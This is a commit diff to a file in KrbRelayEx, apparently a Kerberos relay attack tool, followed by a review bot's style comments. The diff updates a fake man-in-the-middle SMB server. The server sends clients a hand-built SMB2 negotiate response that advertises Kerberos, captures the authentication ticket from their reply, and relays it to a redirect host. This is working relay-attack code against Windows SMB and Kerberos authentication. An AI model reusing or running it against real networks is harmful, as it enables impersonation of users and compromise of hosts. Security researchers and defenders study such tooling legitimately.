
Commit f29def0

authored
Update SMBSockets.cs
1 parent ac2ce2e commit f29def0

1 file changed

+47
-7
lines changed

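--- a/KrbRelayEx/Clients/Attacks/Smb/SMBSockets.cs
+++ b/KrbRelayEx/Clients/Attacks/Smb/SMBSockets.cs
@@ -1,4 +1,5 @@
-using KrbRelay.Clients;
+
+using KrbRelay.Clients;
 using KrbRelay;
 using SMBLibrary.Client;
 using SMBLibrary;
@@ -156,7 +157,8 @@ public class FakeSMBServer
 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x04, 0x00};
 
-
+byte[] smb2NegotiateKerberosProtocolResponse = { 0x0, 0x0, 0x0, 0xd4, 0xfe, 0x53, 0x4d, 0x42, 0x40, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x41, 0x0, 0x1, 0x0, 0x2, 0x2, 0x0, 0x0, 0x57, 0x50, 0x73, 0x64, 0x50, 0x4d, 0x6a, 0x73, 0x65, 0x4f, 0x5a, 0x62, 0x43, 0x56, 0x64, 0x6a, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x80, 0x8d, 0x8c, 0xcc, 0xe, 0xe4, 0xdb, 0x1, 0x80, 0x8d, 0x8c, 0xcc, 0xe, 0xe4, 0xdb, 0x1, 0x80, 0x0, 0x54, 0x0, 0x0, 0x0, 0x0, 0x0, 0x60, 0x52, 0x6, 0x6, 0x2b, 0x6, 0x1, 0x5, 0x5, 0x2, 0xa0, 0x48, 0x30, 0x46, 0xa0, 0x18, 0x30, 0x16, 0x6, 0x9, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x12, 0x1, 0x2, 0x2, 0x6, 0x9, 0x2a, 0x86, 0x48, 0x82, 0xf7, 0x12, 0x1, 0x2, 0x2, 0xa3, 0x2a, 0x30, 0x28, 0xa0, 0x26, 0x1b, 0x24, 0x6e, 0x6f, 0x74, 0x5f, 0x64, 0x65, 0x66, 0x69, 0x6e, 0x65, 0x64, 0x5f, 0x69, 0x6e, 0x5f, 0x52, 0x46, 0x43, 0x34, 0x31,
+0x37, 0x38, 0x40, 0x70, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x5f, 0x69, 0x67, 0x6e, 0x6f, 0x72, 0x65 };
 public FakeSMBServer(int listenPort, string targetHost, int targetPort)
 {
 /*_listenerSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
@@ -192,7 +194,7 @@ public void Start(bool fwd)
 _isRunning = true;
 _listenerSocket.BeginAccept(OnClientConnect, null);
 
-
+
 
 }
 public void Stop()
@@ -281,13 +283,51 @@ private void OnDataFromClient(IAsyncResult ar)
 {
 
 Program.forwdardmode = true;
+
+if(Helpers.PatternAt(state.Buffer, new byte[] { 0xfe, 0x53 }) > -1)
+{
+/*Program.forwdardmode = false;
 
+byte[] AccessDeniedPacket = new byte[]
+{
+0x00, 0x00, 0x00, 0x48,
+0xFE, 0x53, 0x4D, 0x42,
+0x40, 0x00, 0x01, 0x00,
+//0x22, 0x00, 0x00, 0xC0,
+0x5C, 0x03, 0x00, 0xC0,
+0x03, 0x00, 0x01, 0x00,
+0x19, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00,
+0xFF, 0xFE, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00,
+0x31, 0x12, 0xDA, 0x4A,
+0x6E, 0xBC, 0xDA, 0x94,
+0xB3, 0x29, 0x2B, 0x8A,
+0x5E, 0x23, 0xF0, 0x14,
+0x09, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00
+};
+
+state.SourceSocket.Send(AccessDeniedPacket, AccessDeniedPacket.Length, SocketFlags.None);
+*/
+CloseConnection(state);
+//Stop();
+//Start(false);
+return;
+}
 state.isRelayed = true;
-Console.WriteLine("[*] MiTMServer [{0}]: sending smbNegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
+/*Console.WriteLine("[*] MiTMServer [{0}]: sending smbNegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
 state.SourceSocket.Send(smbNegotiateProtocolResponse, smbNegotiateProtocolResponse.Length, SocketFlags.None);
 l = state.SourceSocket.Receive(buffer);
 Console.WriteLine("[*] MiTMServer [{0}]: sending smb3NegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
 state.SourceSocket.Send(smb3NegotiateProtocolResponse, smb3NegotiateProtocolResponse.Length, SocketFlags.None);
+l = state.SourceSocket.Receive(buffer);*/
+Console.WriteLine("[*] MiTMServer [{0}]: sending smb2NegotiateKerberpsProtocolResponse", state.SourceSocket.RemoteEndPoint);
+state.SourceSocket.Send(smb2NegotiateKerberosProtocolResponse, smb2NegotiateKerberosProtocolResponse.Length, SocketFlags.None);
 l = state.SourceSocket.Receive(buffer);
 //int ticketOffset = Helpers.PatternAt(buffer, new byte[] { 0x60, 0x82 }); // 0x6e, 0x82, 0x06
 buffer = buffer.Skip(4).ToArray();
@@ -333,8 +373,8 @@ private void OnDataFromClient(IAsyncResult ar)
 smbc.currSourceSocket = state.SourceSocket;
 smbc.currDestSocket = state.TargetSocket;
 smbc.ServerType = ServerType;
-smbc.curSocketServer = this;
-bool isConnected = smbc.Connect(IPAddress.Parse(Program.RedirectHost) , SMBTransportType.DirectTCPTransport);
+smbc.currSocketServer = this;
+bool isConnected = smbc.Connect(IPAddress.Parse(Program.RedirectHost), SMBTransportType.DirectTCPTransport);
 if (!isConnected)
 {
 Console.WriteLine("[-] Could not connect to [{0}:445]", Program.RedirectHost);
@@ -480,4 +520,4 @@ public void CloseConnection(State state)
 //Console.WriteLine($"Error closing connection: {ex.Message}");
 }
 }
-}
+}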
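Review bot: The `if(Helpers.PatternAt(state.Buffer, new byte[] { 0xfe, 0x53 }) > -1)` branch added to OnDataFromClient carries about thirty lines of commented-out code (the `AccessDeniedPacket` array, its `Send`, `//Stop();`, `//Start(false);`), so its only live statements are `CloseConnection(state); return;` and nothing records why such a buffer is dropped. Delete the dead block and state the intent in one line, for example `// Buffer contains 0xFE 0x53 (presumably the start of an SMB2 protocol id): close without replying.`; the same applies to the `/* ... */` now wrapped around the old `smbNegotiateProtocolResponse`/`smb3NegotiateProtocolResponse` exchange just below. `Program.forwdardmode = true;` is still assigned before this branch returns while the reset to `false` sits inside the comment, which may be unintended and is worth confirming. The new log string reads `smb2NegotiateKerberpsProtocolResponse` (should be `Kerberos`), and the `smb2NegotiateKerberosProtocolResponse` array is added without a comment saying what the hard-coded packet encodes. OnDataFromClient begins and ends outside the hunks shown.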
